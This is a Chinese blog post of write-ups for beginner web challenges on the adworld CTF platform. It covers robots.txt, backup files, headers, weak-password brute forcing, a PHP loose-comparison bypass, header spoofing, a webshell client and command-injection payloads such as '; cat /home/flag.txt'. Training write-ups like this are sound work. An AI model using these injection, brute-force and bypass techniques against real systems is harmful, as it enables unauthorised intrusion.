

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="https://sina.wuuconix.link/large/007YVyKcly1h1w9ogawmvj30jg0jgtdg.jpg">
  <link rel="icon" href="https://sina.wuuconix.link/large/007YVyKcly1h1w9ogawmvj30jg0jgtdg.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="wuuconix">
  <meta name="keywords" content="">
  
    <meta name="description" content="攻防世界刷题笔记  背景 最近博客好久没更新了。CTFHUB web基础部分刷完很久了，提高部分的题目太难了，而且量也少。看了一眼阮行止学长提供的刷题顺序。打算开始做攻防世界。攻防世界在很久以前刚接触CTF的时候做了一些题目。当时每道题几乎都是看的wp，基础知识太薄弱了。现在做应该会好些。  view_source 1234&lt;script&gt;document.oncont">
<meta property="og:type" content="article">
<meta property="og:title" content="攻防世界刷题笔记">
<meta property="og:url" content="https://wuuconix.link/2021/09/23/adworld/index.html">
<meta property="og:site_name" content="wuuconix&#39;s blog">
<meta property="og:description" content="攻防世界刷题笔记  背景 最近博客好久没更新了。CTFHUB web基础部分刷完很久了，提高部分的题目太难了，而且量也少。看了一眼阮行止学长提供的刷题顺序。打算开始做攻防世界。攻防世界在很久以前刚接触CTF的时候做了一些题目。当时每道题几乎都是看的wp，基础知识太薄弱了。现在做应该会好些。  view_source 1234&lt;script&gt;document.oncont">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://sina.wuuconix.link/large/007YVyKcly1h44gkitv0zj30xe0mnabg.jpg">
<meta property="article:published_time" content="2021-09-23T05:10:49.000Z">
<meta property="article:modified_time" content="2021-09-23T05:10:49.000Z">
<meta property="article:author" content="wuuconix">
<meta property="article:tag" content="ctf">
<meta property="article:tag" content="writeup">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://sina.wuuconix.link/large/007YVyKcly1h44gkitv0zj30xe0mnabg.jpg">
  
  
  
  <title>攻防世界刷题笔记 - wuuconix&#39;s blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/toubudaziji.css">
<link rel="stylesheet" href="/css/gundongtiao.css">
<link rel="stylesheet" href="/css/APlayer.min.css">
<link rel="stylesheet" href="/css/scrollbar.css">
<link rel="stylesheet" href="//at.alicdn.com/t/font_3317131_6niuojsefqt.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"wuuconix.link","root":"/","version":"1.9.4","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":"Tpnm8c3kMWvXEXe6TN9JQnvb-gzGzoHsz","app_key":"1I9i7nfFTc4ulrrtGwfite4s","server_url":"https://tpnm8c3k.lc-cn-n1-shared.com","path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  

  

  
    
  



  
<meta name="generator" content="Hexo 6.3.0"><link rel="alternate" href="/atom.xml" title="wuuconix's blog" type="application/atom+xml">
</head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>wuuconix</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://sina.wuuconix.link/large/007YVyKcly1h3o0iezazyj31hc0u0dha.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="攻防世界刷题笔记"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2021-09-23 05:10" pubdate>
          2021年9月23日 凌晨
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          9.6k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          80 分钟
        
      </span>
    

    
    
      
        <span id="leancloud-page-views-container" class="post-meta" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="leancloud-page-views"></span> 次
        </span>
        
      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">攻防世界刷题笔记</h1>
            
            
              <div class="markdown-body">
                
                <header><meta name="referrer" content="never"></header>

    <div id="aplayer-bBghIUkx" class="aplayer aplayer-tag-marker meting-tag-marker"
         data-id="725619" data-server="netease" data-type="song" data-mode="circulation" data-autoplay="false" data-mutex="true" data-listmaxheight="340px" data-preload="auto" data-theme="#555"
    ></div>
<h1 id="攻防世界刷题笔记"><a class="markdownIt-Anchor" href="#攻防世界刷题笔记"></a> 攻防世界刷题笔记</h1>
<h2 id="背景"><a class="markdownIt-Anchor" href="#背景"></a> 背景</h2>
<p>最近博客好久没更新了。CTFHUB web基础部分刷完很久了，提高部分的题目太难了，而且量也少。看了一眼阮行止学长提供的刷题顺序。打算开始做攻防世界。攻防世界在很久以前刚接触CTF的时候做了一些题目。当时每道题几乎都是看的wp，基础知识太薄弱了。现在做应该会好些。</p>
<h2 id="view_source"><a class="markdownIt-Anchor" href="#view_source"></a> view_source</h2>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs html"><span class="hljs-tag">&lt;<span class="hljs-name">script</span>&gt;</span><span class="language-javascript"></span><br><span class="language-javascript"><span class="hljs-variable language_">document</span>.<span class="hljs-property">oncontextmenu</span>=<span class="hljs-keyword">new</span> <span class="hljs-title class_">Function</span>(<span class="hljs-string">&quot;return false&quot;</span>)</span><br><span class="language-javascript"><span class="hljs-variable language_">document</span>.<span class="hljs-property">onselectstart</span>=<span class="hljs-keyword">new</span> <span class="hljs-title class_">Function</span>(<span class="hljs-string">&quot;return false&quot;</span>)</span><br><span class="language-javascript"></span><span class="hljs-tag">&lt;/<span class="hljs-name">script</span>&gt;</span><br></code></pre></td></tr></table></figure>
<p>页面禁用了右键。用<code>Ctrl + U</code>或者<code>F12</code>或者加<code>view-souce:</code>前缀都可以获得flag。</p>
<p><img src="https://upyun.wuuconix.link/image-20210923105115220.png" srcset="/img/loading.gif" lazyload alt="view-source" /></p>
<h2 id="robots"><a class="markdownIt-Anchor" href="#robots"></a> robots</h2>
<figure class="highlight dts"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs dts"><span class="hljs-symbol">url:</span>http:<span class="hljs-comment">//111.200.241.244:51547/robots.txt</span><br><br>User-agent: *<br><span class="hljs-symbol">Disallow:</span> <br><span class="hljs-symbol">Disallow:</span> f1ag_1s_h3re.php<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210923105304352.png" srcset="/img/loading.gif" lazyload alt="robots.txt" /></p>
<p>简单的robots.txt隐藏信息。</p>
<h2 id="backup"><a class="markdownIt-Anchor" href="#backup"></a> backup</h2>
<p>页面提示<code>你知道index.php的备份文件名吗？</code></p>
<p>以下为常用的<code>index.php</code>备份文件。</p>
<figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs stylus">index<span class="hljs-selector-class">.php</span><br>index<span class="hljs-selector-class">.phps</span><br><span class="hljs-selector-class">.index</span><span class="hljs-selector-class">.php</span><span class="hljs-selector-class">.swp</span><br><span class="hljs-selector-class">.index</span><span class="hljs-selector-class">.php</span><span class="hljs-selector-class">.swo</span><br><span class="hljs-selector-class">.index</span><span class="hljs-selector-class">.php</span><span class="hljs-selector-class">.swn</span><br>index<span class="hljs-selector-class">.php</span>.php~<br>index<span class="hljs-selector-class">.php</span><span class="hljs-selector-class">.bak</span><br>index<span class="hljs-selector-class">.php</span><span class="hljs-selector-class">.txt</span><br>index<span class="hljs-selector-class">.php</span>.old<br></code></pre></td></tr></table></figure>
<p>在这道题中为<code>index.php.bak</code>。</p>
<p><img src="https://upyun.wuuconix.link/image-20210923105709605.png" srcset="/img/loading.gif" lazyload alt="index.php.bak" /></p>
<h2 id="cokkie"><a class="markdownIt-Anchor" href="#cokkie"></a> Cokkie</h2>
<p>开局提示<code>你知道什么是cookie吗？</code>。</p>
<p>我一共知道三种方式来看Cokkie，实际上就是HTTP的响应包。</p>
<ol>
<li>
<p>Burpsuite。这比较麻烦，懒得开Burp 2333。</p>
</li>
<li>
<p>浏览器开发者工具-&gt;网络-&gt;标头</p>
<p><img src="https://upyun.wuuconix.link/image-20210923115518148.png" srcset="/img/loading.gif" lazyload alt="浏览器标头" /></p>
</li>
<li>
<p>利用curl命令直接看（非常优雅</p>
<figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs ada">curl -h<br>-I, <span class="hljs-comment">--head          Show document info only</span><br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210923120039762.png" srcset="/img/loading.gif" lazyload alt="curl -I 或者 --head" /></p>
</li>
</ol>
<h2 id="disabled_button"><a class="markdownIt-Anchor" href="#disabled_button"></a> disabled_button</h2>
<p>按钮被设置了<code>disabled</code>属性无法点击。在F12里删除后点击即可。</p>
<p><img src="https://upyun.wuuconix.link/image-20210923122923779.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
<h2 id="weak-auth"><a class="markdownIt-Anchor" href="#weak-auth"></a> weak auth</h2>
<p>Burp Cluster Bomb集束炸弹爆破。</p>
<p><img src="https://upyun.wuuconix.link/image-20210923124004357.png" srcset="/img/loading.gif" lazyload alt="爆破" /></p>
<p>账号admin 密码123456</p>
<h2 id="simple_php"><a class="markdownIt-Anchor" href="#simple_php"></a> simple_php</h2>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">show_source</span>(<span class="hljs-keyword">__FILE__</span>);<br><span class="hljs-keyword">include</span>(<span class="hljs-string">&quot;config.php&quot;</span>);<br><span class="hljs-variable">$a</span>=@<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;a&#x27;</span>];<br><span class="hljs-variable">$b</span>=@<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;b&#x27;</span>];<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$a</span>==<span class="hljs-number">0</span> <span class="hljs-keyword">and</span> <span class="hljs-variable">$a</span>)&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag1</span>;<br>&#125;<br><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_numeric</span>(<span class="hljs-variable">$b</span>))&#123;<br>    <span class="hljs-keyword">exit</span>();<br>&#125;<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$b</span>&gt;<span class="hljs-number">1234</span>)&#123;<br>    <span class="hljs-keyword">echo</span> <span class="hljs-variable">$flag2</span>;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>
<p>php弱类型绕过。</p>
<p>我们先看a。如果我们a传递一个<code>0</code>会怎么样呢？这里有一个常识需要记住，<code>$_GET</code>方式传递的值应该是没法传递整数的，也就是我们在浏览器地址栏的输入的数字实际上也是字符型串。</p>
<p><img src="https://upyun.wuuconix.link/image-20210923125212929.png" srcset="/img/loading.gif" lazyload alt="$_GET string" /></p>
<p>如果我们a传值为<code>0</code>。比较 的时候也就是<code>&quot;0&quot; == 0</code>。在PHP中的<code>==</code>表示类型转化后是否相等。PHP中如果一个数字和一个数字字符串进行比较 ，那么就会自动按照数值进行比较，所以两者是相等的。但是我们无法获得flag，因为在php中<code>&quot;0&quot;</code>是等于的<code>FALSE</code>的。</p>
<p><img src="https://upyun.wuuconix.link/image-20210923125456354.png" srcset="/img/loading.gif" lazyload alt="&quot;0&quot; == FALSE" /></p>
<p>所以我们传一个0，无法获得flag，这里可以用<code>&quot;0a&quot;</code>来绕过<code>&quot;0a&quot;</code>首先是一个字符串，但是它不是数字字符串，因为它不符合数字的规则，但是PHP在8.0版本之前，如果一个字符串和一个数字/<s>数字字符串</s>(php 5.6版本下失败) 进行比较时，会自动将字符串转化为数值。一个字符串如何转化为数值呢？其实就是根据它字符串中的最大数字字符串前缀来决定的。如下面的例子。</p>
<p><img src="https://upyun.wuuconix.link/image-20210923130340465.png" srcset="/img/loading.gif" lazyload alt="字符与数字比较的例子 " /></p>
<p><code>123a</code>的最大数字字符串前缀为<code>123</code>。<code>a123</code>没有数字字符串的前缀，因为它第一个字符就是字母，所以它的等效数值为0。<code>1e2a</code>的前缀是科学计数法的<code>1e2</code>，所以它的等效数值为100。</p>
<p>了解了这些，我们很容易就想到一些payload来得到第一部分的flag。</p>
<figure class="highlight livecodeserver"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs livecodeserver">?<span class="hljs-keyword">a</span>=<span class="hljs-keyword">a</span><br>?<span class="hljs-keyword">a</span>=<span class="hljs-number">0</span><span class="hljs-keyword">a</span><br></code></pre></td></tr></table></figure>
<p>再看 第二部分，首先<code>b</code>不能为数字 ，但是它要大于<code>1234</code>。用<code>1235a</code>就可以了。因为字符串<code>1235a</code>在和1234比较的时候会自动转化为数值1235，比1234大，同时它还不是数字，实现绕过。</p>
<p>最终paylaod</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">?<span class="hljs-attribute">a</span>=a&amp;b=1235a<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210923130911663.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
<h2 id="postget"><a class="markdownIt-Anchor" href="#postget"></a> POST&amp;GET</h2>
<p><img src="https://upyun.wuuconix.link/image-20210924112225663.png" srcset="/img/loading.gif" lazyload alt="题目" /></p>
<p>可以用Hackerbar来发请求。这里写个request脚本吧。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><br>data = &#123;<span class="hljs-string">&#x27;b&#x27;</span>: <span class="hljs-number">2</span>&#125;<br>response = requests.post(<span class="hljs-string">&quot;http://111.200.241.244:54388/?a=1&quot;</span>, data=data).text<br><span class="hljs-built_in">print</span>(response)<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210924112326872.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
<h2 id="xff_referer"><a class="markdownIt-Anchor" href="#xff_referer"></a> xff_referer</h2>
<p>题目提示说ip地址必须是123.123.123.123，还必须来自https://www.google.com</p>
<blockquote>
<p><strong>X-Forwarded-For</strong>（<strong>XFF</strong>）是用来识别通过<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/HTTP">HTTP</a><a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E4%BB%A3%E7%90%86">代理</a>或<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/%E8%B4%9F%E8%BD%BD%E5%9D%87%E8%A1%A1">负载均衡</a>方式连接到<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/Web%E6%9C%8D%E5%8A%A1%E5%99%A8">Web服务器</a>的客户端最原始的<a target="_blank" rel="noopener" href="https://baike.baidu.com/item/IP%E5%9C%B0%E5%9D%80">IP地址</a>的HTTP请求头字段。</p>
</blockquote>
<blockquote>
<p><code>Referer</code>字段实际上告诉了服务器，用户在访问当前资源之前的位置。这往往可以用来用户跟踪。一个典型的应用是，有些网站不允许图片外链，只有自家的网站才能显示图片，外部网站加载图片就会报错。它的实现就是基于<code>Referer</code>字段，如果该字段的网址是自家网址，就放行。</p>
</blockquote>
<p>这道题里在请求包里加上两个属性即可。</p>
<p><img src="https://upyun.wuuconix.link/image-20210924113053647.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
<h2 id="webshell"><a class="markdownIt-Anchor" href="#webshell"></a> webshell</h2>
<p><img src="https://upyun.wuuconix.link/image-20210924113324797.png" srcset="/img/loading.gif" lazyload alt="题目" /></p>
<p>蚁剑直连即可。</p>
<p><img src="https://upyun.wuuconix.link/image-20210924113229572.png" srcset="/img/loading.gif" lazyload alt="蚁剑连接过程" /></p>
<p><img src="https://upyun.wuuconix.link/image-20210924113241200.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
<h2 id="command_execution"><a class="markdownIt-Anchor" href="#command_execution"></a> command_execution</h2>
<p>常见的命令执行题，利用命令分割符实现命令联合执行。</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros">; <span class="hljs-built_in">find</span> / -name <span class="hljs-string">&quot;*flag*&quot;</span><br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210924115112810.png" srcset="/img/loading.gif" lazyload alt="/home/flag.txt" /></p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">; cat <span class="hljs-regexp">/home/</span>flag.txt<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210924115228747.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
<h2 id="simple_js"><a class="markdownIt-Anchor" href="#simple_js"></a> simple_js</h2>
<p>开局让你输密码，但是无论你输什么，它都会弹出这句话。</p>
<p><img src="https://upyun.wuuconix.link/image-20210924123503030.png" srcset="/img/loading.gif" lazyload alt="faux password haha" /></p>
<p>查看源代码，发现一个长相丑陋的js代码。</p>
<figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-keyword">function</span> <span class="hljs-title function_">dechiffre</span>(<span class="hljs-params">pass_enc</span>)&#123;<br>    <span class="hljs-keyword">var</span> pass = <span class="hljs-string">&quot;70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65&quot;</span>;<br>    <span class="hljs-keyword">var</span> tab  = pass_enc.<span class="hljs-title function_">split</span>(<span class="hljs-string">&#x27;,&#x27;</span>);<br>            <span class="hljs-keyword">var</span> tab2 = pass.<span class="hljs-title function_">split</span>(<span class="hljs-string">&#x27;,&#x27;</span>);<span class="hljs-keyword">var</span> i,j,k,l=<span class="hljs-number">0</span>,m,n,o,p = <span class="hljs-string">&quot;&quot;</span>;i = <span class="hljs-number">0</span>;j = tab.<span class="hljs-property">length</span>;<br>                    k = j + (l) + (n=<span class="hljs-number">0</span>);<br>                    n = tab2.<span class="hljs-property">length</span>;<br>                    <span class="hljs-keyword">for</span>(i = (o=<span class="hljs-number">0</span>); i &lt; (k = j = n); i++ )&#123;o = tab[i-l];p += <span class="hljs-title class_">String</span>.<span class="hljs-title function_">fromCharCode</span>((o = tab2[i]));<br>                            <span class="hljs-keyword">if</span>(i == <span class="hljs-number">5</span>)<span class="hljs-keyword">break</span>;&#125;<br>                    <span class="hljs-keyword">for</span>(i = (o=<span class="hljs-number">0</span>); i &lt; (k = j = n); i++ )&#123;<br>                    o = tab[i-l];<br>                            <span class="hljs-keyword">if</span>(i &gt; <span class="hljs-number">5</span> &amp;&amp; i &lt; k-<span class="hljs-number">1</span>)<br>                                    p += <span class="hljs-title class_">String</span>.<span class="hljs-title function_">fromCharCode</span>((o = tab2[i]));<br>                    &#125;<br>    p += <span class="hljs-title class_">String</span>.<span class="hljs-title function_">fromCharCode</span>(tab2[<span class="hljs-number">17</span>]);<br>    pass = p;<span class="hljs-keyword">return</span> pass;<br>&#125;<br><span class="hljs-title class_">String</span>[<span class="hljs-string">&quot;fromCharCode&quot;</span>](<span class="hljs-title function_">dechiffre</span>(<span class="hljs-string">&quot;\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30&quot;</span>));<br><br>h = <span class="hljs-variable language_">window</span>.<span class="hljs-title function_">prompt</span>(<span class="hljs-string">&#x27;Enter password&#x27;</span>);<br><span class="hljs-title function_">alert</span>( <span class="hljs-title function_">dechiffre</span>(h) );<br></code></pre></td></tr></table></figure>
<p>我们发现在此代码中有一些奇怪的数值，比如<code>70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65</code>和<code>\x35\x35\x2c\x35\x36\x2c\x35\x34\x2c\x37\x39\x2c\x31\x31\x35\x2c\x36\x39\x2c\x31\x31\x34\x2c\x31\x31\x36\x2c\x31\x30\x37\x2c\x34\x39\x2c\x35\x30&quot;</code>。</p>
<p>观察第一个，怀疑是ascii码值。这里写一个简易脚本。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs python">s = <span class="hljs-string">&quot;70,65,85,88,32,80,65,83,83,87,79,82,68,32,72,65,72,65&quot;</span>.split(<span class="hljs-string">&quot;,&quot;</span>)<br>result = <span class="hljs-string">&quot;&quot;</span><br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> s:<br>    result += <span class="hljs-built_in">chr</span>(<span class="hljs-built_in">int</span>(i))<br><span class="hljs-built_in">print</span>(result)<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210924124406669.png" srcset="/img/loading.gif" lazyload alt="result" /></p>
<p>这样我们就可以得知了，这个狗屁不同的js代码写了这么多，实际的功能就是把ascii码转化为字符，然后输出出来，不管我们输入的&quot;密码&quot;究竟是什么。</p>
<p>ok，那我么再分析第二个可以字符串，它是十六进制编码，我们可以用python直接print出来。</p>
<p><img src="https://upyun.wuuconix.link/image-20210924124814832.png" srcset="/img/loading.gif" lazyload alt="十六进制" /></p>
<p>原来这里又藏了一些ascii码，只要再用上面的脚本跑一下就能出flag了。</p>
<p><img src="https://upyun.wuuconix.link/image-20210924125020221.png" srcset="/img/loading.gif" lazyload alt="flag" /></p>
<p><img src="https://upyun.wuuconix.link/image-20210924125037336.png" srcset="/img/loading.gif" lazyload alt="题目描述" /></p>
<p>配合上题目秒数里的flag格式，即可得到最终flag。</p>
<h2 id="baby_web"><a class="markdownIt-Anchor" href="#baby_web"></a> baby_web</h2>
<p>题目描述：想想初始页面是哪个</p>
<p><img src="https://upyun.wuuconix.link/image-20210924125552242.png" srcset="/img/loading.gif" lazyload alt="1.php" /></p>
<p>打开来的页面是<code>1.php</code>。这十分奇怪，我们手动访问<code>index.php</code>也会自动跳转到<code>1.php</code>。</p>
<p>于是我们利用优雅的命令行<code>curl</code>来康康有什么玄机。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">curl http:<span class="hljs-regexp">//</span><span class="hljs-number">111.200</span>.<span class="hljs-number">241.244</span>:<span class="hljs-number">57896</span>/index.php<br></code></pre></td></tr></table></figure>
<p><img src="https://upyun.wuuconix.link/image-20210924125736958.png" srcset="/img/loading.gif" lazyload alt="flag is hidden" /></p>
<p>能藏哪呢？只能响应包的标头里了吧2333</p>
<p><img src="https://upyun.wuuconix.link/image-20210924125818403.png" srcset="/img/loading.gif" lazyload alt="curl -I" /></p>
<p>成功得到flag。同时我们也知道了跳转的原因了，是<code>Location</code>在起作用。</p>
<p>php如何添加头部信息呢？十分方便，用<code>header</code>函数即可。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">header</span>(<span class="hljs-string">&quot;Location: index.html&quot;</span>);<br></code></pre></td></tr></table></figure>
<h2 id="training-www-robots"><a class="markdownIt-Anchor" href="#training-www-robots"></a> Training-WWW-Robots</h2>
<p>简单的robots.txt藏信息，这不是和之前的<code>robots</code>题目重复了嘛2333。</p>
<p><img src="https://upyun.wuuconix.link/image-20210924130214511.png" srcset="/img/loading.gif" lazyload alt="robots.txt" /></p>
<p><img src="https://upyun.wuuconix.link/image-20210924130222624.png" srcset="/img/loading.gif" lazyload alt="ctf" /></p>
